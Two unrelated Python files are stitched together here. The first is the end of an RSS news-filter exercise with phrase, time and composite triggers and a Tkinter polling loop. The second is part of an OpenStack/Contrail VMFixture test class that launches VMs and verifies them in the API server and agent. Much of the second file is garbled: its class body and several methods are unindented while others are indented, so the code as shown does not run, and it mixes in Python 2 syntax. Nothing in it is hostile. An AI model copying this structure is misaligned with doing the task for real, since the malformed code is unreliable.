        """Return the URL of the full story."""
        return self.link

    def get_pubdate(self):
        """Return the publication datetime."""
        return self.pubdate
#======================
# Triggers
#======================
class Trigger(object):
    def evaluate(self, story):
        """
        Returns True if an alert should be generated
        for the given news item, or False otherwise.
        """
        # DO NOT CHANGE THIS!
        raise NotImplementedError


# PHRASE TRIGGERS

# Problem 2
class PhraseTrigger(Trigger):
    """Trigger that fires when a whole-word phrase appears in some text."""

    def __init__(self, phrase):
        # The phrase to search for; matching is case-insensitive.
        self.phrase = phrase

    def is_phrase_in(self, text):
        """Return True if self.phrase occurs in *text* as consecutive whole
        words, case-insensitively, with punctuation treated as spaces.

        Bug fix: the old hand-rolled scanner reset to the start of the
        phrase on a mismatch without re-examining the current text word,
        so a repeated leading word was missed (e.g. phrase 'a b' was not
        found in text 'a a b'). A sliding-window comparison over the word
        lists is both correct and simpler.
        """
        for ch in string.punctuation:
            text = text.replace(ch, ' ')
        words = text.lower().split()
        phrase = self.phrase.lower().split()
        n = len(phrase)
        return any(words[i:i + n] == phrase
                   for i in range(len(words) - n + 1))
# Problem 3
# TODO: TitleTrigger
class TitleTrigger(PhraseTrigger):
    """PhraseTrigger applied to a story's title."""

    def __init__(self, phrase):
        PhraseTrigger.__init__(self, phrase)

    def evaluate(self, story):
        """Fire exactly when the phrase occurs in the story's title."""
        return self.is_phrase_in(story.get_title())
# Problem 4
# TODO: DescriptionTrigger
class DescriptionTrigger(PhraseTrigger):
    """PhraseTrigger applied to a story's description."""

    def __init__(self, phrase):
        PhraseTrigger.__init__(self, phrase)

    def evaluate(self, story):
        """Fire exactly when the phrase occurs in the story's description."""
        return self.is_phrase_in(story.get_description())
# TIME TRIGGERS
# Problem 5
# TODO: TimeTrigger
# Constructor:
# Input: Time has to be in EST and in the format of "%d %b %Y %H:%M:%S".
# Convert time from string to a datetime before saving it as an attribute.
class TimeTrigger(Trigger):
    """Base class for triggers that compare a story's pubdate to a cutoff.

    The cutoff string must be EST in the format "%d %b %Y %H:%M:%S"; it is
    parsed once at construction into a (naive) datetime, self.time_check.
    """

    def __init__(self, time_check):
        self.time_check = datetime.strptime(time_check, "%d %b %Y %H:%M:%S")
# Problem 6
# TODO: BeforeTrigger and AfterTrigger
class BeforeTrigger(TimeTrigger):
    """Fires for stories published strictly before the stored cutoff."""

    def __init__(self, time_string):
        TimeTrigger.__init__(self, time_string)

    def evaluate(self, story):
        """Return True when the story's pubdate precedes the cutoff time.

        The comparison is field-by-field (year, then month, then seconds
        elapsed within the month), exactly as before, so naive and
        tz-aware datetimes compare without raising.
        """
        def _key(dt):
            # Seconds within the month cover day + time of day in one number.
            secs = dt.second + 60 * dt.minute + 3600 * dt.hour + 86400 * dt.day
            return (dt.year, dt.month, secs)
        return _key(story.get_pubdate()) < _key(self.time_check)
class AfterTrigger(TimeTrigger):
    """Fires for stories published strictly after the stored cutoff."""

    def __init__(self, time_string):
        TimeTrigger.__init__(self, time_string)

    def evaluate(self, story):
        """Return True when the story's pubdate follows the cutoff time.

        Mirrors BeforeTrigger's field-by-field comparison (year, month,
        seconds within the month), avoiding naive/aware datetime errors.
        """
        def _key(dt):
            secs = dt.second + 60 * dt.minute + 3600 * dt.hour + 86400 * dt.day
            return (dt.year, dt.month, secs)
        return _key(story.get_pubdate()) > _key(self.time_check)
# COMPOSITE TRIGGERS
# Problem 7
# TODO: NotTrigger
class NotTrigger(Trigger):
    """Inverts the result of a wrapped trigger."""

    def __init__(self, trigger):
        self.trigger = trigger

    def evaluate(self, story):
        """Fire exactly when the wrapped trigger does not fire."""
        return not self.trigger.evaluate(story)
# Problem 8
# TODO: AndTrigger
class AndTrigger(Trigger):
    """Fires only when both of two wrapped triggers fire."""

    def __init__(self, trig1, trig2):
        self.trig1 = trig1
        self.trig2 = trig2

    def evaluate(self, story):
        """Short-circuiting conjunction of the two wrapped triggers."""
        return all(t.evaluate(story) for t in (self.trig1, self.trig2))
# Problem 9
# TODO: OrTrigger
class OrTrigger(Trigger):
    """Fires when either of two wrapped triggers fires."""

    def __init__(self, trig1, trig2):
        self.trig1 = trig1
        self.trig2 = trig2

    def evaluate(self, story):
        """Short-circuiting disjunction of the two wrapped triggers."""
        return any(t.evaluate(story) for t in (self.trig1, self.trig2))
#======================
# Filtering
#======================
# Problem 10
def filter_stories(stories, triggerlist):
    """
    Takes in a list of NewsStory instances.

    Returns: a list of only the stories for which a trigger in triggerlist
    fires. Each story appears at most once and input order is preserved;
    any() short-circuits on the first firing trigger, matching the
    original break-on-first-match behaviour.
    """
    return [story for story in stories
            if any(trigger.evaluate(story) for trigger in triggerlist)]
#======================
# User-Specified Triggers
#======================
# Problem 11
def read_trigger_config(filename):
    """
    filename: the name of a trigger configuration file

    Returns: a list of trigger objects specified by the trigger configuration
        file. (Parsing is still TODO -- for now the cleaned lines are only
        printed and the function returns None.)
    """
    # We give you the code to read in the file and eliminate blank lines and
    # comments. You don't need to know how it works for now!
    # Bug fix: use a context manager so the file handle is always closed
    # (the original opened the file and never closed it).
    lines = []
    with open(filename, 'r') as trigger_file:
        for line in trigger_file:
            line = line.rstrip()
            if not (len(line) == 0 or line.startswith('//')):
                lines.append(line)

    # TODO: Problem 11
    # line is the list of lines that you need to parse and for which you need
    # to build triggers
    print(lines)  # for now, print it so you see what it contains!
SLEEPTIME = 120  # seconds between RSS polling rounds in main_thread
def main_thread(master):
    """Poll the Google/Yahoo RSS feeds forever, showing filtered stories
    in a Tkinter window parented on *master*. Any exception is printed
    and ends the loop."""
    # A sample trigger list - you might need to change the phrases to correspond
    # to what is currently in the news
    try:
        t1 = TitleTrigger("Vietnam")
        t2 = DescriptionTrigger("Trade")
        t3 = DescriptionTrigger("Facebook")
        # Fire only when BOTH 'Trade' and 'Facebook' appear in the description.
        t4 = AndTrigger(t2, t3)
        triggerlist = [t1, t4]

        # Problem 11
        # TODO: After implementing read_trigger_config, uncomment this line
        # triggerlist = read_trigger_config('triggers.txt')

        # HELPER CODE - you don't need to understand this!
        # Draws the popup window that displays the filtered stories
        # Retrieves and filters the stories from the RSS feeds
        frame = Frame(master)
        frame.pack(side=BOTTOM)
        scrollbar = Scrollbar(master)
        scrollbar.pack(side=RIGHT,fill=Y)

        t = "Google & Yahoo Top News"
        title = StringVar()
        title.set(t)
        ttl = Label(master, textvariable=title, font=("Helvetica", 18))
        ttl.pack(side=TOP)
        cont = Text(master, font=("Helvetica",14), yscrollcommand=scrollbar.set)
        cont.pack(side=BOTTOM)
        cont.tag_config("title", justify='center')
        # NOTE(review): this uses the global 'root' rather than the 'master'
        # parameter -- it works because __main__ passes root in, but worth
        # confirming/normalising.
        button = Button(frame, text="Exit", command=root.destroy)
        button.pack(side=BOTTOM)
        guidShown = []

        def get_cont(newstory):
            # Show each story at most once, keyed by its guid.
            if newstory.get_guid() not in guidShown:
                cont.insert(END, newstory.get_title()+"\n", "title")
                cont.insert(END, "\n---------------------------------------------------------------\n", "title")
                cont.insert(END, newstory.get_description())
                cont.insert(END, "\n*********************************************************************\n", "title")
                guidShown.append(newstory.get_guid())

        # Poll both feeds, filter, display, then sleep -- forever.
        while True:
            print("Polling . . .", end=' ')
            # Get stories from Google's Top Stories RSS news feed
            stories = process("http://news.google.com/news?output=rss")
            # Get stories from Yahoo's Top Stories RSS news feed
            stories.extend(process("http://news.yahoo.com/rss/topstories"))

            stories = filter_stories(stories, triggerlist)

            list(map(get_cont, stories))
            scrollbar.config(command=cont.yview)

            print("Sleeping...")
            time.sleep(SLEEPTIME)

    except Exception as e:
        print(e)
if __name__ == '__main__':
    # NOTE(review): the polling thread and mainloop are commented out below,
    # so running this module currently just constructs an (unused) Tk root
    # and exits. Uncomment to enable the GUI.
    root = Tk()
    # root.title("Some RSS parser")
    # t = threading.Thread(target=main_thread, args=(root,))
    # t.start()
    # root.mainloop()
|
vm_test.py | import fixtures
import re
from ipam_test import *
from vn_test import *
from util import *
import time
import traceback
from fabric.api import env
from fabric.api import run
from fabric.state import output
from fabric.state import connections as fab_connections
from fabric.operations import get, put
from fabric.context_managers import settings, hide
import socket
import paramiko
from contrail_fixtures import *
import threading
from tcutils.pkgs.install import PkgHost, build_and_install
env.disable_known_hosts = True
from webui_test import *
#output.debug= True
#@contrail_fix_ext ()
class VMFixture(fixtures.Fixture):
'''
Fixture to handle creation, verification and deletion of VM.
image_name : One of cirros-0.3.0-x86_64-uec, redmine-fe, redmine-be, ubuntu
Deletion of the VM upon exit can be disabled by setting fixtureCleanup= 'no' in params file.
If a VM with the vm_name is already present, it is not deleted upon exit. To forcefully clean them up, set fixtureCleanup= 'force'
Vn object can be a single VN object(vn_obj) or a list of VN objects(vn_objs) but not both
'''
def __init__(self, connections, vm_name, vn_obj=None,
             vn_objs=None, project_name='admin',
             image_name='ubuntu', subnets=None,
             flavor='contrail_flavor_small',
             node_name=None, sg_ids=None, count=1, userdata=None,
             port_ids=None, fixed_ips=None):
    """Record connection handles and initialise all verification state.

    Bug fix: the list parameters previously used mutable default
    arguments ([]), which are shared between every call that relies on
    the default and can leak state between fixtures. They now default to
    None and are replaced with fresh lists; callers that pass their own
    lists are unaffected.
    """
    if vn_objs is None:
        vn_objs = []
    if subnets is None:
        subnets = []
    if sg_ids is None:
        sg_ids = []
    if port_ids is None:
        port_ids = []
    if fixed_ips is None:
        fixed_ips = []

    # Handles to the testbed's API servers and inspect utilities.
    self.connections = connections
    self.api_s_inspects = self.connections.api_server_inspects
    self.api_s_inspect = self.connections.api_server_inspect
    self.agent_inspect = self.connections.agent_inspect
    self.cn_inspect = self.connections.cn_inspect
    self.ops_inspect = self.connections.ops_inspects
    self.quantum_fixture = self.connections.quantum_fixture
    self.vnc_lib_fixture = self.connections.vnc_lib_fixture
    self.quantum_h = self.quantum_fixture.get_handle()
    self.vnc_lib_h = self.connections.vnc_lib
    self.nova_fixture = self.connections.nova_fixture
    self.node_name = node_name
    self.sg_ids = sg_ids
    self.count = count
    self.port_ids = port_ids
    self.fixed_ips = fixed_ips
    self.subnets = subnets
    # self.vn_fixture= vn_fixture
    # A single vn_obj takes precedence over vn_objs; normalise to a list.
    if vn_obj:
        vn_objs = [vn_obj]
    self.vn_obj = vn_obj
    if not isinstance(vn_objs, list):
        self.vn_objs = [vn_objs]
    else:
        self.vn_objs = vn_objs
    self.project_name = project_name
    self.flavor = flavor
    self.image_name = image_name
    self.vm_name = vm_name
    self.vm_obj = None
    self.vm_ip = None
    self.agent_vn_obj = {}
    self.vn_names = [x['network']['name'] for x in self.vn_objs]
    # self.vn_fq_names = [':'.join(x['network']['contrail:fq_name'])
    #                     for x in self.vn_objs]
    self.vn_fq_names = [':'.join(self.vnc_lib_h.id_to_fq_name(x['network']['id']))
                        for x in self.vn_objs]
    # Convenience singular forms only exist when exactly one VN was given.
    if len(vn_objs) == 1:
        self.vn_name = self.vn_names[0]
        self.vn_fq_name = self.vn_fq_names[0]
    self.inputs = self.connections.inputs
    self.logger = self.inputs.logger
    self.already_present = False
    self.verify_is_run = False
    self.analytics_obj = self.connections.analytics_obj
    # Per-compute-node caches populated during verification.
    self.agent_vn_obj = {}
    self.agent_vrf_obj = {}
    self.agent_vrf_name = {}
    self.agent_vrf_id = {}
    self.agent_path = {}
    self.agent_l2_path = {}
    self.tap_intf = {}
    self.mac_addr = {}
    self.agent_label = {}
    self.agent_l2_label = {}
    self.agent_vxlan_id = {}
    self.local_ips = {}
    self.vm_ip_dict = {}
    self.cs_vmi_obj = {}
    self.vm_ips = []
    # Flags recording the outcome of each verification step.
    self.vm_launch_flag = True
    self.vm_in_api_flag = True
    self.vm_in_agent_flag = True
    self.vm_in_cn_flag = True
    self.vm_in_op_flag = True
    self.verify_vm_not_in_setup = True
    self.verify_vm_not_in_api_server_flag = True
    self.verify_vm_not_in_agent_flag = True
    self.verify_vm_not_in_control_nodes_flag = True
    self.verify_vm_not_in_nova_flag = True
    self.vm_flows_removed_flag = True
    # Serialises log output from concurrent verification threads.
    self.printlock = threading.Lock()
    self.verify_vm_flag = True
    self.userdata = userdata
    self.vm_username = None
    self.vm_password = None
    if self.inputs.webui_verification_flag:
        self.browser = self.connections.browser
        self.browser_openstack = self.connections.browser_openstack
        self.webui = WebuiTest(self.connections, self.inputs)
# end __init__
    def setUp(self):
        """Create (or reuse) the VM under a project fixture.

        Looks up the VM by name first; when it already exists the fixture
        only records it (``self.already_present``) and does not create a
        new one.  Otherwise the VM is created either through the WebUI
        (when ``inputs.webui_config_flag`` is set) or through nova.
        Populates ``self.vm_obj`` / ``self.vm_objs`` and the guest login
        credentials for the image.
        """
        super(VMFixture, self).setUp()
        # The project fixture supplies the tenant uuid used for all
        # subsequent nova queries/creates.
        self.project_fixture = self.useFixture(
            ProjectFixture(vnc_lib_h=self.vnc_lib_h,
                           project_name=self.project_name,
                           connections=self.connections))
        self.vn_ids = [x['network']['id'] for x in self.vn_objs]
        self.vm_obj = self.nova_fixture.get_vm_if_present(
            self.vm_name, self.project_fixture.uuid)
        self.vm_objs = self.nova_fixture.get_vm_list(name_pattern=self.vm_name,
                                                     project_id=self.project_fixture.uuid)
        if self.vm_obj:
            # Reuse path: the VM pre-exists, so teardown should not delete
            # resources this fixture did not create.
            self.already_present = True
            with self.printlock:
                self.logger.debug('VM %s already present, not creating it'
                                  % (self.vm_name))
        else:
            if self.inputs.webui_config_flag:
                self.webui.create_vm_in_openstack(self)
            else:
                objs = self.nova_fixture.create_vm(
                    project_uuid=self.project_fixture.uuid,
                    image_name=self.image_name,
                    flavor=self.flavor,
                    vm_name=self.vm_name,
                    vn_ids=self.vn_ids,
                    node_name=self.node_name,
                    sg_ids=self.sg_ids,
                    count=self.count,
                    userdata = self.userdata,
                    port_ids = self.port_ids,
                    fixed_ips = self.fixed_ips)
                # NOTE(review): fixed settle delay after create; presumably
                # gives nova time to register the instances -- confirm
                # whether a poll would be more appropriate.
                time.sleep(5)
                self.vm_obj = objs[0]
                self.vm_objs = objs
        # Guest ssh credentials for this image (used by the ping_* helpers).
        (self.vm_username, self.vm_password) = self.nova_fixture.get_image_account(
            self.image_name)
    # end setUp
def verify_vm_launched(self):
self.vm_launch_flag = True
self.vm_id = self.vm_objs[0].id
for vm_obj in self.vm_objs:
vm_id = vm_obj.id
self.nova_fixture.get_vm_detail(vm_obj)
for vn_name in self.vn_names:
if len(self.nova_fixture.get_vm_ip(vm_obj, vn_name)) == 0:
with self.printlock:
self.logger.error('VM %s did not seem to have got any IP'
% (vm_obj.name))
self.vm_launch_flag = self.vm_launch_flag and False
return False
self.vm_ips.append(
self.nova_fixture.get_vm_ip(vm_obj, vn_name)[0])
with self.printlock:
self.logger.info('VM %s launched on Node %s'
% (vm_obj.name, self.nova_fixture.get_nova_host_of_vm(vm_obj)))
if len(self.vm_ips) >= 1:
self.vm_ip = self.nova_fixture.get_vm_ip(
self.vm_obj, self.vn_names[0])[0]
else:
with self.printlock:
self.logger.error('VM %s did not seem to have got an IP '
'at all ' % (vm_obj.name))
self.vm_launch_flag = self.vm_launch_flag and False
return False
with self.printlock:
self.logger.info("VM %s ID is %s" % (vm_obj.name, vm_obj.id))
# end for vm_obj
self.vm_launch_flag = self.vm_launch_flag and True
return True
# end verify_vm_launched
def add_security_group(self, secgrp):
self.nova_fixture.add_security_group(self.vm_obj.id, secgrp)
def remove_security_group(self, secgrp):
self.nova_fixture.remove_security_group(self.vm_obj.id, secgrp)
def verify_security_group(self, secgrp):
cs_vmi_objs = self.api_s_inspect.get_cs_vmi_of_vm(
self.vm_id, refresh=True)
for cs_vmi_obj in cs_vmi_objs:
vmi = cs_vmi_obj['virtual-machine-interface']
if vmi.has_key('security_group_refs'):
sec_grps = vmi['security_group_refs']
for sec_grp in sec_grps:
if secgrp == sec_grp['to'][-1]:
self.logger.info(
"Security group %s is attached \ to the VM %s", secgrp, self.vm_name)
return True, None
errmsg = "Security group %s is not attached to the VM %s" % (secgrp,
self.vm_name)
self.logger.warn(errmsg)
return False, errmsg
    def verify_on_setup(self, force=False):
        """Run the full post-launch verification suite for the VM.

        The launch/IP check runs (and is joined) first since it populates
        self.vm_ip/self.vm_ips used by the later phases; the API-server,
        agent, control-node and opserver checks then run in threads.  Each
        phase records its outcome in a ``self.*_flag`` attribute; the
        aggregate is returned and mirrored in ``self.verify_vm_flag``.

        :param force: run even when ``inputs.verify_on_setup`` is 'False'.
        """
        if self.inputs.verify_on_setup == 'False' and not force:
            self.logger.info('Skipping VM %s verification' % (self.vm_name))
            return True
        result = True
        self.verify_vm_flag = True
        t_launch = threading.Thread(target=self.verify_vm_launched, args=())
        t_launch.start()
        time.sleep(1)
        t_launch.join()
        # No IP means launch failed; nothing else can be verified.
        if not self.vm_ip:
            self.verify_vm_flag = False
            result = result and False
            return result
        self.verify_vm_flag = result and self.nova_fixture.wait_till_vm_is_active(
            self.vm_obj)
        if self.inputs.webui_verification_flag:
            self.webui.verify_vm_in_webui(self)
        # API-server verification is joined before the remaining phases
        # start, since the agent check consumes self.cs_vmi_obj it fills in.
        t_api = threading.Thread(target=self.verify_vm_in_api_server, args=())
        t_api.start()
        time.sleep(1)
        t_api.join()
        t_agent = threading.Thread(target=self.verify_vm_in_agent, args=())
        t_agent.start()
        time.sleep(1)
        t_cn = threading.Thread(
            target=self.verify_vm_in_control_nodes, args=())
        t_cn.start()
        time.sleep(1)
        t_op = threading.Thread(target=self.verify_vm_in_opserver, args=())
        t_op.start()
        time.sleep(1)
        t_agent.join()
        t_cn.join()
        t_op.join()
        if not self.vm_launch_flag:
            self.verify_vm_flag = self.verify_vm_flag and result
            return False
        # Fold each phase's flag into the aggregate, logging failures.
        if not self.vm_in_api_flag:
            with self.printlock:
                self.logger.error('VM %s verification in API Server failed'
                                  % (self.vm_name))
            result = result and False
            self.verify_vm_flag = self.verify_vm_flag and result
        if not self.vm_in_agent_flag:
            with self.printlock:
                self.logger.error('VM %s verification in Agent failed'
                                  % (self.vm_name))
            result = result and False
            self.verify_vm_flag = self.verify_vm_flag and result
        if not self.vm_in_cn_flag:
            with self.printlock:
                self.logger.error('Route verification for VM %s in Controlnodes'
                                  ' failed ' % (self.vm_name))
            result = result and False
            self.verify_vm_flag = self.verify_vm_flag and result
        if not self.vm_in_op_flag:
            with self.printlock:
                self.logger.error('VM %s verification in Opserver failed'
                                  % (self.vm_name))
            result = result and False
            self.verify_vm_flag = self.verify_vm_flag and result
        self.verify_is_run = True
        return result
    # end verify_on_setup
def mini_verify_on_setup(self):
result = True
if not self.verify_vm_launched():
return False
if not self.verify_vm_in_api_server():
self.logger.error('VM %s verification in API Server failed'
% (self.vm_name))
result = result and False
if not self.verify_vm_in_agent():
self.logger.error('VM %s verification in Agent failed'
% (self.vm_name))
result = result and False
self.verify_is_run = True
return result
# end mini_verify_on_setup
def get_vrf_id(self, vn_fq_name, vn_vrf_name):
inspect_h = self.agent_inspect[self.vm_node_ip]
(domain, project, vn) = vn_fq_name.split(':')
agent_vrf_objs_vn = inspect_h.get_vna_vrf_objs(domain, project, vn)
agent_vrf_obj_vn = self.get_matching_vrf(
agent_vrf_objs_vn['vrf_list'],
vn_vrf_name)
vn_vrf_id = agent_vrf_obj_vn['ucindex']
return vn_vrf_id
# end get_vrf_id
def chk_vmi_for_vrf_entry(self, vn_fq_name):
try:
cs_vmi_obj = {}
cs_vmi_objs_vm = self.api_s_inspect.get_cs_vmi_of_vm(self.vm_id)
inspect_h = self.agent_inspect[self.vm_node_ip]
for vmi_obj in cs_vmi_objs_vm:
vmi_id = vmi_obj[
'virtual-machine-interface']['virtual_network_refs'][0]['uuid']
vmi_vn_fq_name = ':'.join(
vmi_obj['virtual-machine-interface']['virtual_network_refs'][0]['to'])
cs_vmi_obj[vmi_vn_fq_name] = vmi_obj
tap_intf = {}
tmp_vmi_id = cs_vmi_obj[vmi_vn_fq_name][
'virtual-machine-interface']['uuid']
tap_intf[vn_fq_name] = inspect_h.get_vna_tap_interface_by_vmi(
vmi_id=tmp_vmi_id)[0]
vrf_entry = tap_intf[vn_fq_name]['fip_list'][0]['vrf_name']
return vrf_entry
except IndexError, e:
self.logger.error('No VRF Entry listed')
return None
# end chk_vmi_for_vrf_entry
def chk_vmi_for_fip(self, vn_fq_name):
try:
cs_vmi_obj = {}
cs_vmi_objs_vm = self.api_s_inspect.get_cs_vmi_of_vm(self.vm_id)
inspect_h = self.agent_inspect[self.vm_node_ip]
for vmi_obj in cs_vmi_objs_vm:
vmi_id = vmi_obj[
'virtual-machine-interface']['virtual_network_refs'][0]['uuid']
vmi_vn_fq_name = ':'.join(
vmi_obj['virtual-machine-interface']['virtual_network_refs'][0]['to'])
cs_vmi_obj[vmi_vn_fq_name] = vmi_obj
tap_intf = {}
tmp_vmi_id = vmi_id = cs_vmi_obj[vmi_vn_fq_name][
'virtual-machine-interface']['uuid']
tap_intf[vn_fq_name] = inspect_h.get_vna_tap_interface_by_vmi(
vmi_id=tmp_vmi_id)[0]
fip_addr_vm = tap_intf[vn_fq_name]['fip_list'][0]['ip_addr']
return fip_addr_vm
except IndexError, e:
self.logger.error('No FIP Address listed')
return None
# end chk_vmi_for_fip
    @retry(delay=2, tries=15)
    def verify_vm_in_api_server(self):
        '''Validate API-Server objects for a VM.
        Checks if Instance IP in API Server is same as what
        Orchestration system gave it.
        Checks if the virtual-machine-interface's VN in API Server is correct.

        Caches per-cfgm VM/VMI/instance-ip objects in self.cs_* dicts and
        fills self.vm_ip_dict (IP per VN fq-name) and self.cs_vmi_obj
        (VMI per VN fq-name) for use by the agent verification.
        Records the outcome in self.vm_in_api_flag.
        '''
        self.vm_in_api_flag = True
        self.cs_vm_obj = {}
        self.cs_vmi_objs = {}
        self.cs_instance_ip_objs = {}
        # First pass: collect objects from every config node.
        for cfgm_ip in self.inputs.cfgm_ips:
            api_inspect = self.api_s_inspects[cfgm_ip]
            self.cs_vm_obj[cfgm_ip] = api_inspect.get_cs_vm(self.vm_id)
            self.cs_vmi_objs[
                cfgm_ip] = api_inspect.get_cs_vmi_of_vm(self.vm_id)
            self.cs_instance_ip_objs[
                cfgm_ip] = api_inspect.get_cs_instance_ips_of_vm(self.vm_id)
        # Second pass: validate the collected objects per config node.
        for cfgm_ip in self.inputs.cfgm_ips:
            self.logger.info("Verifying in api server %s" % (cfgm_ip))
            if not self.cs_instance_ip_objs[cfgm_ip]:
                with self.printlock:
                    self.logger.error('Instance IP of VM ID %s not seen in '
                                      'API Server ' % (self.vm_id))
                self.vm_in_api_flag = self.vm_in_api_flag and False
                return False
            for instance_ip_obj in self.cs_instance_ip_objs[cfgm_ip]:
                ip = instance_ip_obj['instance-ip']['instance_ip_address']
                # Every instance-ip must be one the orchestrator reported.
                if ip not in self.vm_ips:
                    with self.printlock:
                        self.logger.warn('Instance IP %s from API Server is '
                                         ' not found in VM IP list %s' % (ip, str(self.vm_ips)))
                    self.vm_in_api_flag = self.vm_in_api_flag and False
                    return False
                ip_vn_fq_name = ':'.join(
                    instance_ip_obj['instance-ip']['virtual_network_refs'][0]['to'])
                self.vm_ip_dict[ip_vn_fq_name] = ip
            for vmi_obj in self.cs_vmi_objs[cfgm_ip]:
                # NOTE(review): despite its name, vmi_id here is the uuid of
                # the VMI's *virtual-network* ref, which is why it is checked
                # against self.vn_ids.
                vmi_id = vmi_obj[
                    'virtual-machine-interface']['virtual_network_refs'][0]['uuid']
                vmi_vn_fq_name = ':'.join(
                    vmi_obj['virtual-machine-interface']['virtual_network_refs'][0]['to'])
                if vmi_id not in self.vn_ids:
                    with self.printlock:
                        self.logger.warn('VMI %s of VM %s is not mapped to the '
                                         'right VN ID in API Server' % (vmi_id, self.vm_name))
                    self.vm_in_api_flag = self.vm_in_api_flag and False
                    return False
                self.cs_vmi_obj[vmi_vn_fq_name] = vmi_obj
            with self.printlock:
                self.logger.info("API Server validations for VM %s passed in api server %s"
                                 % (self.vm_name, cfgm_ip))
        with self.printlock:
            self.logger.info("API Server validations for VM %s passed"
                             % (self.vm_name))
        self.vm_in_api_flag = self.vm_in_api_flag and True
        return True
    # end verify_vm_in_api_server
@retry(delay=2, tries=15)
def verify_vm_not_in_api_server(self):
self.verify_vm_not_in_api_server_flag = True
for ip in self.inputs.cfgm_ips:
self.logger.info("Verifying in api server %s" % (ip))
api_inspect = self.api_s_inspects[ip]
if api_inspect.get_cs_vm(self.vm_id, refresh=True) is not None:
with self.printlock:
self.logger.warn("VM ID %s of VM %s is still found in API Server"
% (self.vm_id, self.vm_name))
self.verify_vm_not_in_api_server_flag = self.verify_vm_not_in_api_server_flag and False
return False
if api_inspect.get_cs_vr_of_vm(self.vm_id, refresh=True) is not None:
with self.printlock:
self.logger.warn('API-Server still seems to have VM reference '
'for VM %s' % (self.vm_name))
self.verify_vm_not_in_api_server_flag = self.verify_vm_not_in_api_server_flag and False
return False
if api_inspect.get_cs_vmi_of_vm(
self.vm_id, refresh=True) is not None:
with self.printlock:
self.logger.warn("API-Server still has VMI info of VM %s"
% (self.vm_name))
self.verify_vm_not_in_api_server_flag = self.verify_vm_not_in_api_server_flag and False
return False
with self.printlock:
self.logger.info(
"VM %s information is fully removed in API-Server " % (self.vm_name))
self.verify_vm_not_in_api_server_flag = self.verify_vm_not_in_api_server_flag and True
return True
# end verify_vm_not_in_api_server
@retry(delay=2, tries=20)
def verify_vm_in_agent(self):
''' Verifies whether VM has got created properly in agent.
'''
self.vm_in_agent_flag = True
nova_host = self.inputs.host_data[
self.nova_fixture.get_nova_host_of_vm(self.vm_obj)]
self.vm_node_ip = nova_host['host_ip']
self.vm_node_data_ip = nova_host['host_data_ip']
inspect_h = self.agent_inspect[self.vm_node_ip]
for vn_fq_name in self.vn_fq_names:
fw_mode = self.vnc_lib_fixture.get_forwarding_mode(vn_fq_name)
(domain, project, vn) = vn_fq_name.split(':')
self.agent_vn_obj[vn_fq_name] = inspect_h.get_vna_vn(
domain, project, vn)
if not self.agent_vn_obj[vn_fq_name]:
with self.printlock:
self.logger.warn('VN %s is not seen in agent %s'
% (vn_fq_name, self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
# Check if the VN ID matches between the Orchestration S and Agent
# if self.vn_id != self.agent_vn_obj['uuid']:
if self.agent_vn_obj[vn_fq_name]['uuid'] not in self.vn_ids:
with self.printlock:
self.logger.warn("VN UUID %s not created in agent in node %s"
% (vn_name, self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
vna_tap_id = inspect_h.get_vna_tap_interface_by_vmi(
vmi_id=self.cs_vmi_obj[vn_fq_name]['virtual-machine-interface']['uuid'])
self.tap_intf[vn_fq_name] = vna_tap_id[0]
if not self.tap_intf[vn_fq_name]:
with self.printlock:
self.logger.error('Tap interface in VN %s for VM %s not '
'seen in agent %s '
% (vn_fq_name, self.vm_name, self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
self.mac_addr[vn_fq_name] = self.tap_intf[vn_fq_name]['mac_addr']
if self.mac_addr[vn_fq_name] != self.cs_vmi_obj[vn_fq_name]['virtual-machine-interface']['virtual_machine_interface_mac_addresses']['mac_address'][0]:
with self.printlock:
self.logger.error('VM Mac address for VM %s not seen in '
'agent %s or VMI mac is not matching with API '
'Server information' % (self.vm_name, self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
self.tap_intf[vn_fq_name] = inspect_h.get_vna_intf_details(
self.tap_intf[vn_fq_name]['name'])[0]
self.agent_vrf_name[vn_fq_name] = self.tap_intf[
vn_fq_name]['vrf_name']
self.agent_vrf_objs = inspect_h.get_vna_vrf_objs(
domain, project, vn)
self.agent_vrf_obj[vn_fq_name] = self.get_matching_vrf(
self.agent_vrf_objs['vrf_list'],
self.agent_vrf_name[vn_fq_name])
self.agent_vrf_id[vn_fq_name] = self.agent_vrf_obj[
vn_fq_name]['ucindex']
if fw_mode != unicode('l2'):
self.agent_path[vn_fq_name] = inspect_h.get_vna_active_route(
vrf_id=self.agent_vrf_id[vn_fq_name],
ip=self.vm_ip_dict[vn_fq_name],
prefix='32')
if not self.agent_path:
with self.printlock:
self.logger.warning('No path seen for VM IP %s in agent %s'
% (self.vm_ip_dict[vn_fq_name], self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
self.agent_label[vn_fq_name] = self.agent_path[
vn_fq_name]['path_list'][0]['label']
# Check if Tap interface of VM is present in the Agent route
# table
if self.agent_path[vn_fq_name]['path_list'][0]['nh']['itf'] != self.tap_intf[vn_fq_name]['name']:
self.logger.warning("Active route in agent for %s is not "
"pointing to right tap interface. It is %s "
% (self.vm_ip_dict[vn_fq_name],
self.agent_path[vn_fq_name]['path_list'][0]['nh']['itf']))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
else:
with self.printlock:
self.logger.debug('Active route in agent is present for VMI '
'%s ' % (self.tap_intf[vn_fq_name]['name']))
if self.tap_intf[vn_fq_name]['label'] != self.agent_label[vn_fq_name]:
with self.printlock:
self.logger.warning('VM %s label mismatch! , Expected : %s ,'
' Got : %s' % (self.vm_name,
self.tap_intf[
vn_fq_name][
'label'],
self.agent_label[vn_fq_name]))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
else:
with self.printlock:
self.logger.debug('VM %s labels in tap-interface and the '
'route do match ' % (self.vm_name))
# Check if tap interface is set to Active
if self.tap_intf[vn_fq_name]['active'] != 'Active':
with self.printlock:
self.logger.warn('VM %s : Tap interface %s is not set to '
'Active, it is : %s ' % (self.vm_name,
self.tap_intf[
vn_fq_name][
'name'],
self.tap_intf[vn_fq_name]['active']))
else:
with self.printlock:
self.logger.debug('VM %s : Tap interface %s is set to '
' Active' % (self.vm_name,
self.tap_intf[vn_fq_name]['name']))
self.local_ips[vn_fq_name] = self.tap_intf[
vn_fq_name]['mdata_ip_addr']
with self.printlock:
